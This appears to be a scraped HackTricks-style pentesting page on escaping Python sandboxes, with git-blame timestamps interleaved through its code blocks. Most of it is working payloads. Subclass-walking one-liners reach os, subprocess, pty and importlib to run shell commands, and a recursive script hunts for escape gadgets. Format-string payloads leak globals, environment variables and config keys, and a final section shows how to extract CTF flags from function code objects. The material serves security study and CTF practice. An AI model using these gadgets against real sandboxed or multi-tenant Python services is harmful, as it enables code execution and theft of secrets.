[ x.__name__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "sys" in x.__init__.__globals__ ]
['_ModuleLock', '_DummyModuleLock', '_ModuleLockManager', 'ModuleSpec', 'FileLoader', '_NamespacePath', '_NamespaceLoader', 'FileFinder', 'zipimporter', '_ZipImportResourceReader', 'IncrementalEncoder', 'IncrementalDecoder', 'StreamReaderWriter', 'StreamRecoder', '_wrap_close', 'Quitter', '_Printer', 'WarningMessage', 'catch_warnings', '_GeneratorContextManagerBase', '_BaseExitStack', 'Untokenizer', 'FrameSummary', 'TracebackException', 'CompletedProcess', 'Popen', 'finalize', 'NullImporter', '_HackedGetData', '_localized_month', '_localized_day', 'Calendar', 'different_locale', 'SSLObject', 'Request', 'OpenerDirector', 'HTTPPasswordMgr', 'AbstractBasicAuthHandler', 'AbstractDigestAuthHandler', 'URLopener', '_PaddedFile', 'CompressedValue', 'LogRecord', 'PercentStyle', 'Formatter', 'BufferingFormatter', 'Filter', 'Filterer', 'PlaceHolder', 'Manager', 'LoggerAdapter', '_LazyDescr', '_SixMetaPathImporter', 'MimeTypes', 'ConnectionPool', '_LazyDescr', '_SixMetaPathImporter', 'Bytecode', 'BlockFinder', 'Parameter', 'BoundArguments', 'Signature', '_DeprecatedValue', '_ModuleWithDeprecations', 'Scrypt', 'WrappedSocket', 'PyOpenSSLContext', 'ZipInfo', 'LZMACompressor', 'LZMADecompressor', '_SharedFile', '_Tellable', 'ZipFile', 'Path', '_Flavour', '_Selector', 'JSONDecoder', 'Response', 'monkeypatch', 'InstallProgress', 'TextProgress', 'BaseDependency', 'Origin', 'Version', 'Package', '_Framer', '_Unframer', '_Pickler', '_Unpickler', 'NullTranslations']
```
2021-11-30 16:46:07 +00:00
There are a lot, and **we just need one** to execute commands:
2021-06-24 23:53:47 +00:00
```python
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "sys" in x.__init__.__globals__ ][0]["sys"].modules["os"].system("ls")
```
2021-11-30 16:46:07 +00:00
We can do the same thing with **other libraries** that we know can be used to **execute commands** :
2021-06-24 23:53:47 +00:00
```python
#os
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "os" in x.__init__.__globals__ ][0]["os"].system("ls")
2021-10-06 00:19:16 +00:00
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "os" == x.__init__.__globals__["__name__"] ][0]["system"]("ls")
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "'os." in str(x) ][0]['system']('ls')
#subprocess
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "subprocess" == x.__init__.__globals__["__name__"] ][0]["Popen"]("ls")
[ x for x in ''.__class__.__base__.__subclasses__() if "'subprocess." in str(x) ][0]['Popen']('ls')
[ x for x in ''.__class__.__base__.__subclasses__() if x.__name__ == 'Popen' ][0]('ls')
#builtins
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "__bultins__" in x.__init__.__globals__ ]
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "builtins" in x.__init__.__globals__ ][0]["builtins"].__import__("os").system("ls")
#sys
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "sys" in x.__init__.__globals__ ][0]["sys"].modules["os"].system("ls")
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "'_sitebuiltins." in str(x) and not "_Helper" in str(x) ][0]["sys"].modules["os"].system("ls")
2021-06-24 23:53:47 +00:00
#commands (not very common)
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "commands" in x.__init__.__globals__ ][0]["commands"].getoutput("ls")
2021-10-06 00:19:16 +00:00
2021-06-24 23:53:47 +00:00
#pty (not very common)
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "pty" in x.__init__.__globals__ ][0]["pty"].spawn("ls")
2021-10-06 00:19:16 +00:00
2021-06-24 23:53:47 +00:00
#importlib
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "importlib" in x.__init__.__globals__ ][0]["importlib"].import_module("os").system("ls")
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "importlib" in x.__init__.__globals__ ][0]["importlib"].__import__("os").system("ls")
2021-10-06 00:19:16 +00:00
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "'imp." in str(x) ][0]["importlib"].import_module("os").system("ls")
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "'imp." in str(x) ][0]["importlib"].__import__("os").system("ls")
#pdb
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "pdb" in x.__init__.__globals__ ][0]["pdb"].os.system("ls")
2021-06-24 23:53:47 +00:00
```
Moreover, we could even search which modules are loading malicious libraries:
```python
2021-10-06 00:19:16 +00:00
bad_libraries_names = ["os", "commands", "subprocess", "pty", "importlib", "imp", "sys", "builtins", "pip", "pdb"]
2021-06-24 23:53:47 +00:00
for b in bad_libraries_names:
vuln_libs = [ x.__name__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and b in x.__init__.__globals__ ]
print(f"{b}: {', '.join(vuln_libs)}")
"""
os: CompletedProcess, Popen, NullImporter, _HackedGetData, SSLObject, Request, OpenerDirector, HTTPPasswordMgr, AbstractBasicAuthHandler, AbstractDigestAuthHandler, URLopener, _PaddedFile, CompressedValue, LogRecord, PercentStyle, Formatter, BufferingFormatter, Filter, Filterer, PlaceHolder, Manager, LoggerAdapter, HTTPConnection, MimeTypes, BlockFinder, Parameter, BoundArguments, Signature, _FragList, _SSHFormatECDSA, CertificateSigningRequestBuilder, CertificateBuilder, CertificateRevocationListBuilder, RevokedCertificateBuilder, _CallbackExceptionHelper, Context, Connection, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path, _Flavour, _Selector, Cookie, CookieJar, BaseAdapter, InstallProgress, TextProgress, BaseDependency, Origin, Version, Package, _WrappedLock, Cache, ProblemResolver, _FilteredCacheHelper, FilteredCache, NullTranslations
commands:
subprocess: BaseDependency, Origin, Version, Package
pty:
importlib: NullImporter, _HackedGetData, BlockFinder, Parameter, BoundArguments, Signature, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path
imp:
sys: _ModuleLock, _DummyModuleLock, _ModuleLockManager, ModuleSpec, FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, zipimporter, _ZipImportResourceReader, IncrementalEncoder, IncrementalDecoder, StreamReaderWriter, StreamRecoder, _wrap_close, Quitter, _Printer, WarningMessage, catch_warnings, _GeneratorContextManagerBase, _BaseExitStack, Untokenizer, FrameSummary, TracebackException, CompletedProcess, Popen, finalize, NullImporter, _HackedGetData, _localized_month, _localized_day, Calendar, different_locale, SSLObject, Request, OpenerDirector, HTTPPasswordMgr, AbstractBasicAuthHandler, AbstractDigestAuthHandler, URLopener, _PaddedFile, CompressedValue, LogRecord, PercentStyle, Formatter, BufferingFormatter, Filter, Filterer, PlaceHolder, Manager, LoggerAdapter, _LazyDescr, _SixMetaPathImporter, MimeTypes, ConnectionPool, _LazyDescr, _SixMetaPathImporter, Bytecode, BlockFinder, Parameter, BoundArguments, Signature, _DeprecatedValue, _ModuleWithDeprecations, Scrypt, WrappedSocket, PyOpenSSLContext, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path, _Flavour, _Selector, JSONDecoder, Response, monkeypatch, InstallProgress, TextProgress, BaseDependency, Origin, Version, Package, _Framer, _Unframer, _Pickler, _Unpickler, NullTranslations, _wrap_close
builtins: FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, IncrementalEncoder, IncrementalDecoder, StreamReaderWriter, StreamRecoder, Repr, Completer, CompletedProcess, Popen, _PaddedFile, BlockFinder, Parameter, BoundArguments, Signature
2021-10-06 00:19:16 +00:00
pdb:
2021-06-24 23:53:47 +00:00
"""
```
2021-11-30 16:46:07 +00:00
Moreover, if you think **other libraries** may be able to **invoke functions to execute commands** , we can also **filter by functions names** inside the possible libraries:
2021-06-24 23:53:47 +00:00
```python
2021-10-06 00:19:16 +00:00
bad_libraries_names = ["os", "commands", "subprocess", "pty", "importlib", "imp", "sys", "builtins", "pip", "pdb"]
2021-06-25 13:52:40 +00:00
bad_func_names = ["system", "popen", "getstatusoutput", "getoutput", "call", "Popen", "spawn", "import_module", "__import__", "load_source", "execfile", "execute", "__builtins__"]
2021-06-24 23:53:47 +00:00
for b in bad_libraries_names + bad_func_names:
vuln_funcs = [ x.__name__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) for k in x.__init__.__globals__ if k == b ]
print(f"{b}: {', '.join(vuln_funcs)}")
"""
os: CompletedProcess, Popen, NullImporter, _HackedGetData, SSLObject, Request, OpenerDirector, HTTPPasswordMgr, AbstractBasicAuthHandler, AbstractDigestAuthHandler, URLopener, _PaddedFile, CompressedValue, LogRecord, PercentStyle, Formatter, BufferingFormatter, Filter, Filterer, PlaceHolder, Manager, LoggerAdapter, HTTPConnection, MimeTypes, BlockFinder, Parameter, BoundArguments, Signature, _FragList, _SSHFormatECDSA, CertificateSigningRequestBuilder, CertificateBuilder, CertificateRevocationListBuilder, RevokedCertificateBuilder, _CallbackExceptionHelper, Context, Connection, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path, _Flavour, _Selector, Cookie, CookieJar, BaseAdapter, InstallProgress, TextProgress, BaseDependency, Origin, Version, Package, _WrappedLock, Cache, ProblemResolver, _FilteredCacheHelper, FilteredCache, NullTranslations
commands:
subprocess: BaseDependency, Origin, Version, Package
pty:
importlib: NullImporter, _HackedGetData, BlockFinder, Parameter, BoundArguments, Signature, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path
imp:
sys: _ModuleLock, _DummyModuleLock, _ModuleLockManager, ModuleSpec, FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, zipimporter, _ZipImportResourceReader, IncrementalEncoder, IncrementalDecoder, StreamReaderWriter, StreamRecoder, _wrap_close, Quitter, _Printer, WarningMessage, catch_warnings, _GeneratorContextManagerBase, _BaseExitStack, Untokenizer, FrameSummary, TracebackException, CompletedProcess, Popen, finalize, NullImporter, _HackedGetData, _localized_month, _localized_day, Calendar, different_locale, SSLObject, Request, OpenerDirector, HTTPPasswordMgr, AbstractBasicAuthHandler, AbstractDigestAuthHandler, URLopener, _PaddedFile, CompressedValue, LogRecord, PercentStyle, Formatter, BufferingFormatter, Filter, Filterer, PlaceHolder, Manager, LoggerAdapter, _LazyDescr, _SixMetaPathImporter, MimeTypes, ConnectionPool, _LazyDescr, _SixMetaPathImporter, Bytecode, BlockFinder, Parameter, BoundArguments, Signature, _DeprecatedValue, _ModuleWithDeprecations, Scrypt, WrappedSocket, PyOpenSSLContext, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path, _Flavour, _Selector, JSONDecoder, Response, monkeypatch, InstallProgress, TextProgress, BaseDependency, Origin, Version, Package, _Framer, _Unframer, _Pickler, _Unpickler, NullTranslations, _wrap_close
builtins: FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, IncrementalEncoder, IncrementalDecoder, StreamReaderWriter, StreamRecoder, Repr, Completer, CompletedProcess, Popen, _PaddedFile, BlockFinder, Parameter, BoundArguments, Signature
2021-10-06 00:19:16 +00:00
pip:
pdb:
2021-06-24 23:53:47 +00:00
system: _wrap_close, _wrap_close
getstatusoutput: CompletedProcess, Popen
getoutput: CompletedProcess, Popen
call: CompletedProcess, Popen
Popen: CompletedProcess, Popen
spawn:
import_module:
__import__: _ModuleLock, _DummyModuleLock, _ModuleLockManager, ModuleSpec
load_source: NullImporter, _HackedGetData
execfile:
execute:
__builtins__: _ModuleLock, _DummyModuleLock, _ModuleLockManager, ModuleSpec, FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, zipimporter, _ZipImportResourceReader, IncrementalEncoder, IncrementalDecoder, StreamReaderWriter, StreamRecoder, _wrap_close, Quitter, _Printer, DynamicClassAttribute, _GeneratorWrapper, WarningMessage, catch_warnings, Repr, partialmethod, singledispatchmethod, cached_property, _GeneratorContextManagerBase, _BaseExitStack, Completer, State, SubPattern, Tokenizer, Scanner, Untokenizer, FrameSummary, TracebackException, _IterationGuard, WeakSet, _RLock, Condition, Semaphore, Event, Barrier, Thread, CompletedProcess, Popen, finalize, _TemporaryFileCloser, _TemporaryFileWrapper, SpooledTemporaryFile, TemporaryDirectory, NullImporter, _HackedGetData, DOMBuilder, DOMInputSource, NamedNodeMap, TypeInfo, ReadOnlySequentialNamedNodeMap, ElementInfo, Template, Charset, Header, _ValueFormatter, _localized_month, _localized_day, Calendar, different_locale, AddrlistClass, _PolicyBase, BufferedSubFile, FeedParser, Parser, BytesParser, Message, HTTPConnection, SSLObject, Request, OpenerDirector, HTTPPasswordMgr, AbstractBasicAuthHandler, AbstractDigestAuthHandler, URLopener, _PaddedFile, Address, Group, HeaderRegistry, ContentManager, CompressedValue, _Feature, LogRecord, PercentStyle, Formatter, BufferingFormatter, Filter, Filterer, PlaceHolder, Manager, LoggerAdapter, _LazyDescr, _SixMetaPathImporter, Queue, _PySimpleQueue, HMAC, Timeout, Retry, HTTPConnection, MimeTypes, RequestField, RequestMethods, DeflateDecoder, GzipDecoder, MultiDecoder, ConnectionPool, CharSetProber, CodingStateMachine, CharDistributionAnalysis, JapaneseContextAnalysis, UniversalDetector, _LazyDescr, _SixMetaPathImporter, Bytecode, BlockFinder, Parameter, BoundArguments, Signature, _DeprecatedValue, _ModuleWithDeprecations, DSAParameterNumbers, DSAPublicNumbers, DSAPrivateNumbers, ObjectIdentifier, ECDSA, EllipticCurvePublicNumbers, EllipticCurvePrivateNumbers, RSAPrivateNumbers, RSAPublicNumbers, DERReader, BestAvailableEncryption, CBC, XTS, OFB, CFB, CFB8, CTR, GCM, Cipher, _CipherContext, _AEADCipherContext, AES, Camellia, TripleDES, Blowfish, CAST5, ARC4, IDEA, SEED, ChaCha20, _FragList, _SSHFormatECDSA, Hash, SHAKE128, SHAKE256, BLAKE2b, BLAKE2s, NameAttribute, RelativeDistinguishedName, Name, RFC822Name, DNSName, UniformResourceIdentifier, DirectoryName, RegisteredID, IPAddress, OtherName, Extensions, CRLNumber, AuthorityKeyIdentifier, SubjectKeyIdentifier, AuthorityInformationAccess, SubjectInformationAccess, AccessDescription, BasicConstraints, DeltaCRLIndicator, CRLDistributionPoints, FreshestCRL, DistributionPoint, PolicyConstraints, CertificatePolicies, PolicyInformation, UserNotice, NoticeReference, ExtendedKeyUsage, TLSFeature, InhibitAnyPolicy, KeyUsage, NameConstraints, Extension, GeneralNames, SubjectAlternativeName, IssuerAlternativeName, CertificateIssuer, CRLReason, InvalidityDate, PrecertificateSignedCertificateTimestamps, SignedCertificateTimestamps, OCSPNonce, IssuingDistributionPoint, UnrecognizedExtension, CertificateSigningRequestBuilder, CertificateBuilder, CertificateRevocationListBuilder, RevokedCertificateBuilder, _OpenSSLError, Binding, _X509NameInvalidator, PKey, _EllipticCurve, X509Name, X509Extension, X509Req, X509, X509Store, X509StoreContext, Revoked, CRL, PKCS12, NetscapeSPKI, _PassphraseHelper, _CallbackExceptionHelper, Context, Connection, _CipherContext, _CMACContext, _X509ExtensionParser, DHPrivateNumbers, DHPublicNumbers, DHParameterNumbers, _DHParameters, _DHPrivateKey, _DHPublicKey, Prehashed, _DSAVerificationContext, _DSASignatureContext, _DSAParameters, _DSAPrivateKey, _DSAPublicKey, _ECDSASignatureContext, _ECDSAVerificationContext, _EllipticCurvePrivateKey, _EllipticCurvePublicKey, _Ed25519PublicKey, _Ed25519PrivateKey, _Ed448PublicKey, _Ed448PrivateKey, _HashContext, _HMACContext, _Certificate, _RevokedCertificate, _CertificateRevocationList, _CertificateSigningRequest, _SignedCertificateTimestamp, OCSPRequestBuilder, _SingleResponse, OCSPResponseBuilder, _OCSPResponse, _OCSPReq
"""
```
2022-07-02 18:05:33 +00:00
## Recursive Search of Builtins, Globals...
2021-10-06 00:19:16 +00:00
{% hint style="warning" %}
2022-09-12 21:12:49 +00:00
This is just **awesome** . If you are **looking for an object like globals, builtins, open or anything** just use this script to **recursively find places where you can find that object.**
2021-10-06 00:19:16 +00:00
{% endhint %}
```python
2021-10-06 10:13:49 +00:00
import os, sys # Import these to find more gadgets
2021-10-06 09:54:56 +00:00
2021-10-06 00:19:16 +00:00
SEARCH_FOR = {
# Misc
"__globals__": set(),
"builtins": set(),
"__builtins__": set(),
"open": set(),
# RCE libs
"os": set(),
"subprocess": set(),
"commands": set(),
"pty": set(),
"importlib": set(),
"imp": set(),
"sys": set(),
"pip": set(),
"pdb": set(),
# RCE methods
"system": set(),
"popen": set(),
"getstatusoutput": set(),
"getoutput": set(),
"call": set(),
"Popen": set(),
"popen": set(),
"spawn": set(),
"import_module": set(),
"__import__": set(),
"load_source": set(),
"execfile": set(),
"execute": set()
}
2022-09-12 21:12:49 +00:00
#More than 4 is very time consuming
2021-10-06 00:19:16 +00:00
MAX_CONT = 4
2022-09-12 21:12:49 +00:00
#The ALREADY_CHECKED makes the script run much faster, but some solutions won't be found
2021-10-06 00:19:16 +00:00
#ALREADY_CHECKED = set()
def check_recursive(element, cont, name, orig_n, orig_i, execute):
2022-09-12 21:12:49 +00:00
# If bigger than maximum, stop
2021-10-06 00:19:16 +00:00
if cont > MAX_CONT:
return
# If already checked, stop
#if name and name in ALREADY_CHECKED:
# return
# Add to already checked
#if name:
# ALREADY_CHECKED.add(name)
# If found add to the dict
for k in SEARCH_FOR:
if k in dir(element) or (type(element) is dict and k in element):
SEARCH_FOR[k].add(f"{orig_i}: {orig_n}.{name}")
# Continue with the recursivity
for new_element in dir(element):
try:
check_recursive(getattr(element, new_element), cont+1, f"{name}.{new_element}", orig_n, orig_i, execute)
2022-09-12 21:12:49 +00:00
# WARNING: Calling random functions sometimes kills the script
2021-10-06 00:19:16 +00:00
# Comment this part if you notice that behaviour!!
if execute:
try:
if callable(getattr(element, new_element)):
check_recursive(getattr(element, new_element)(), cont+1, f"{name}.{new_element}()", orig_i, execute)
except:
pass
except:
pass
2022-09-12 21:12:49 +00:00
# If in a dict, scan also each key, very important
2021-10-06 00:19:16 +00:00
if type(element) is dict:
for new_element in element:
check_recursive(element[new_element], cont+1, f"{name}[{new_element}]", orig_n, orig_i)
def main():
print("Checking from empty string...")
total = [""]
for i,element in enumerate(total):
print(f"\rStatus: {i}/{len(total)}", end="")
cont = 1
2021-10-06 09:50:35 +00:00
check_recursive(element, cont, "", str(element), f"Empty str {i}", True)
2021-10-06 00:19:16 +00:00
print()
print("Checking loaded subclasses...")
total = "".__class__.__base__.__subclasses__()
for i,element in enumerate(total):
print(f"\rStatus: {i}/{len(total)}", end="")
cont = 1
2021-10-06 09:50:35 +00:00
check_recursive(element, cont, "", str(element), f"Subclass {i}", True)
2021-10-06 00:19:16 +00:00
print()
print("Checking from global functions...")
total = [print, check_recursive]
for i,element in enumerate(total):
print(f"\rStatus: {i}/{len(total)}", end="")
cont = 1
2021-10-06 09:50:35 +00:00
check_recursive(element, cont, "", str(element), f"Global func {i}", False)
2021-10-06 00:19:16 +00:00
print()
print(SEARCH_FOR)
if __name__ == "__main__":
main()
```
2022-09-12 21:12:49 +00:00
You can check the output of this script on this page:
2021-10-06 10:13:49 +00:00
2023-06-06 21:42:32 +00:00
{% content-ref url="broken-reference" %}
[Broken link ](broken-reference )
2021-10-18 11:21:18 +00:00
{% endcontent-ref %}
2021-10-06 10:13:49 +00:00
2023-09-02 23:51:32 +00:00
< figure > < img src = "/.gitbook/assets/image (675).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-08-31 22:35:39 +00:00
2023-09-02 23:48:41 +00:00
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free** ](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks ) today.
2022-08-31 22:35:39 +00:00
2023-09-02 23:48:41 +00:00
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks& utm_source=referral" %}
***
2022-08-31 22:35:39 +00:00
2022-07-02 18:05:33 +00:00
## Python Format String
2021-10-06 00:19:16 +00:00
2021-11-30 16:46:07 +00:00
If you **send** a **string** to python that is going to be **formatted** , you can use `{}` to access **python internal information.** You can use the previous examples to access globals or builtins for example.
2021-10-06 09:50:35 +00:00
{% hint style="info" %}
2022-04-27 12:34:57 +00:00
However, there is a **limitation** , you can only use the symbols `.[]` , so you **won't be able to execute arbitrary code** , just to read information.\
2021-10-06 09:50:35 +00:00
_**If you know how to execute code through this vulnerability, please contact me.**_
{% endhint %}
```python
# Example from https://www.geeksforgeeks.org/vulnerability-in-str-format-in-python/
CONFIG = {
"KEY": "ASXFYFGK78989"
}
class PeopleInfo:
def __init__ (self, fname, lname):
self.fname = fname
self.lname = lname
def get_name_for_avatar(avatar_str, people_obj):
return avatar_str.format(people_obj = people_obj)
people = PeopleInfo('GEEKS', 'FORGEEKS')
st = "{people_obj.__init__.__globals__[CONFIG][KEY]}"
get_name_for_avatar(st, people_obj = people)
```
2021-11-30 16:46:07 +00:00
Note how you can **access attributes** in a normal way with a **dot** like `people_obj.__init__` and **dict element** with **parenthesis** without quotes `__globals__[CONFIG]`
2021-10-06 09:50:35 +00:00
Also note that you can use `.__dict__` to enumerate elements of an object `get_name_for_avatar("{people_obj.__init__.__globals__[os].__dict__}", people_obj = people)`
2021-10-06 12:43:31 +00:00
Some other interesting characteristics from format strings is the possibility of **executing** the **functions** ** `str` **, ** `repr` ** and ** `ascii` ** in the indicated object by adding ** `!s` **, ** `!r` **, ** `!a` ** respectively:
```python
st = "{people_obj.__init__.__globals__[CONFIG][KEY]!a}"
get_name_for_avatar(st, people_obj = people)
```
Moreover, it's possible to **code new formatters** in classes:
```python
class HAL9000(object):
def __format__ (self, format):
if (format == 'open-the-pod-bay-doors'):
return "I'm afraid I can't do that."
return 'HAL 9000'
'{:open-the-pod-bay-doors}'.format(HAL9000())
#I'm afraid I can't do that.
```
2022-04-05 22:24:52 +00:00
**More examples** about **format** **string** examples can be found in [**https://pyformat.info/** ](https://pyformat.info )
2021-10-06 12:43:31 +00:00
2023-06-06 22:57:49 +00:00
{% hint style="danger" %}
Check also the following page for gadgets that will r**ead sensitive information from Python internal objects**:
{% endhint %}
{% content-ref url="../python-internal-read-gadgets.md" %}
[python-internal-read-gadgets.md ](../python-internal-read-gadgets.md )
{% endcontent-ref %}
2022-07-02 18:05:33 +00:00
### Sensitive Information Disclosure Payloads
2021-10-06 09:50:35 +00:00
```python
{whoami.__class__.__dict__}
{whoami.__globals__[os].__dict__}
{whoami.__globals__[os].environ}
{whoami.__globals__[sys].path}
{whoami.__globals__[sys].modules}
# Access an element through several links
{whoami.__globals__[server].__dict__[bridge].__dict__[db].__dict__}
```
2022-07-02 18:05:33 +00:00
## Dissecting Python Objects
2021-10-06 00:19:16 +00:00
2021-10-06 14:43:31 +00:00
{% hint style="info" %}
2022-09-12 21:12:49 +00:00
If you want to **learn** about **python bytecode** in depth read this **awesome** post about the topic: [**https://towardsdatascience.com/understanding-python-bytecode-e7edaae8734d** ](https://towardsdatascience.com/understanding-python-bytecode-e7edaae8734d )
2021-10-06 14:43:31 +00:00
{% endhint %}
2020-07-15 15:43:14 +00:00
2022-09-12 21:12:49 +00:00
In some CTFs you could be provided with the name of a **custom function where the flag** resides and you need to see the **internals** of the **function** to extract it.
2020-07-15 15:43:14 +00:00
This is the function to inspect:
```python
def get_flag(some_input):
var1=1
var2="secretcode"
var3=["some","array"]
if some_input == var2:
return "THIS-IS-THE-FALG!"
else:
return "Nope"
```
2022-07-02 18:05:33 +00:00
#### dir
2020-07-15 15:43:14 +00:00
```python
dir() #General dir() to find what we have loaded
['__builtins__', '__doc__', '__name__', '__package__', 'b', 'bytecode', 'code', 'codeobj', 'consts', 'dis', 'filename', 'foo', 'get_flag', 'names', 'read', 'x']
dir(get_flag) #Get info tof the function
['__call__', '__class__', '__closure__', '__code__', '__defaults__', '__delattr__', '__dict__', '__doc__', '__format__', '__get__', '__getattribute__', '__globals__', '__hash__', '__init__', '__module__', '__name__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', 'func_closure', 'func_code', 'func_defaults', 'func_dict', 'func_doc', 'func_globals', 'func_name']
```
2022-07-02 18:05:33 +00:00
#### globals
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
`__globals__` and `func_globals` (Same) Obtains the global environment. In the example you can see some imported modules, some global variables and their content declared:
2020-07-15 15:43:14 +00:00
```python
get_flag.func_globals
get_flag.__globals__
{'b': 3, 'names': ('open', 'read'), '__builtins__': < module ' __builtin__ ' ( built-in ) > , 'codeobj': < code object < module > at 0x7f58c00b26b0, file "noname", line 1>, 'get_flag': < function get_flag at 0x7f58c00b27d0 > , 'filename': './poc.py', '__package__': None, 'read': < function read at 0x7f58c00b23d0 > , 'code': < type ' code ' > , 'bytecode': 't\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00S', 'consts': (None, './poc.py', 'r'), 'x': < unbound method catch_warnings . __init__ > , '__name__': '__main__', 'foo': < function foo at 0x7f58c020eb50 > , '__doc__': None, 'dis': < module ' dis ' from '/ usr / lib / python2 . 7 / dis . pyc ' > }
#If you have access to some variable value
CustomClassObject.__class__.__init__.__globals__
```
2022-04-05 22:24:52 +00:00
[**See here more places to obtain globals** ](./#globals-and-locals )
2021-10-06 13:23:46 +00:00
2022-07-02 18:05:33 +00:00
### **Accessing the function code**
2021-10-06 13:23:46 +00:00
**`__code__`** and `func_code` : You can **access** this **attribute** of the function to **obtain the code object** of the function.
2020-07-15 15:43:14 +00:00
```python
2021-10-06 13:23:46 +00:00
# In our current example
get_flag.__code__
< code object get_flag at 0x7f9ca0133270 , file " < stdin > ", line 1
# Compiling some python code
compile("print(5)", "", "single")
< code object < module > at 0x7f9ca01330c0, file "", line 1>
2022-09-12 21:12:49 +00:00
#Get the attributes of the code object
2021-10-06 13:23:46 +00:00
dir(get_flag.__code__)
2020-07-15 15:43:14 +00:00
['__class__', '__cmp__', '__delattr__', '__doc__', '__eq__', '__format__', '__ge__', '__getattribute__', '__gt__', '__hash__', '__init__', '__le__', '__lt__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', 'co_argcount', 'co_cellvars', 'co_code', 'co_consts', 'co_filename', 'co_firstlineno', 'co_flags', 'co_freevars', 'co_lnotab', 'co_name', 'co_names', 'co_nlocals', 'co_stacksize', 'co_varnames']
2021-10-06 13:23:46 +00:00
```
2022-07-02 18:05:33 +00:00
### Getting Code Information
2021-10-06 13:23:46 +00:00
```python
2022-05-01 12:41:36 +00:00
# Another example
2021-10-06 13:23:46 +00:00
s = '''
a = 5
b = 'text'
def f(x):
return x
f(5)
'''
c=compile(s, "", "exec")
2021-10-06 15:44:17 +00:00
# __doc__: Get the description of the function, if any
print.__doc__
2021-10-06 13:23:46 +00:00
# co_consts: Constants
get_flag.__code__.co_consts
2020-07-15 15:43:14 +00:00
(None, 1, 'secretcode', 'some', 'array', 'THIS-IS-THE-FALG!', 'Nope')
2021-10-06 13:23:46 +00:00
c.co_consts #Remember that the exec mode in compile() generates a bytecode that finally returns None.
(5, 'text', < code object f at 0x7f9ca0133540 , file " " , line 4 > , 'f', None
# co_names: Names used by the bytecode which can be global variables, functions, and classes or also attributes loaded from objects.
get_flag.__code__.co_names
()
c.co_names
('a', 'b', 'f')
#co_varnames: Local names used by the bytecode (arguments first, then the local variables)
get_flag.__code__.co_varnames
('some_input', 'var1', 'var2', 'var3')
#co_cellvars: Nonlocal variables These are the local variables of a function accessed by its inner functions.
get_flag.__code__.co_cellvars
()
#co_freevars: Free variables are the local variables of an outer function which are accessed by its inner function.
get_flag.__code__.co_freevars
()
2020-07-15 15:43:14 +00:00
#Get bytecode
2021-10-06 13:23:46 +00:00
get_flag.__code__.co_code
2020-07-15 15:43:14 +00:00
'd\x01\x00}\x01\x00d\x02\x00}\x02\x00d\x03\x00d\x04\x00g\x02\x00}\x03\x00|\x00\x00|\x02\x00k\x02\x00r(\x00d\x05\x00Sd\x06\x00Sd\x00\x00S'
```
2022-07-02 18:05:33 +00:00
### **Disassembly a function**
2020-07-15 15:43:14 +00:00
```python
import dis
dis.dis(get_flag)
2 0 LOAD_CONST 1 (1)
3 STORE_FAST 1 (var1)
3 6 LOAD_CONST 2 ('secretcode')
9 STORE_FAST 2 (var2)
4 12 LOAD_CONST 3 ('some')
15 LOAD_CONST 4 ('array')
18 BUILD_LIST 2
21 STORE_FAST 3 (var3)
5 24 LOAD_FAST 0 (some_input)
27 LOAD_FAST 2 (var2)
30 COMPARE_OP 2 (==)
33 POP_JUMP_IF_FALSE 40
2022-09-12 21:12:49 +00:00
6 36 LOAD_CONST 5 ('THIS-IS-THE-FLAG!')
2020-07-15 15:43:14 +00:00
39 RETURN_VALUE
8 >> 40 LOAD_CONST 6 ('Nope')
43 RETURN_VALUE
44 LOAD_CONST 0 (None)
2021-01-18 14:15:45 +00:00
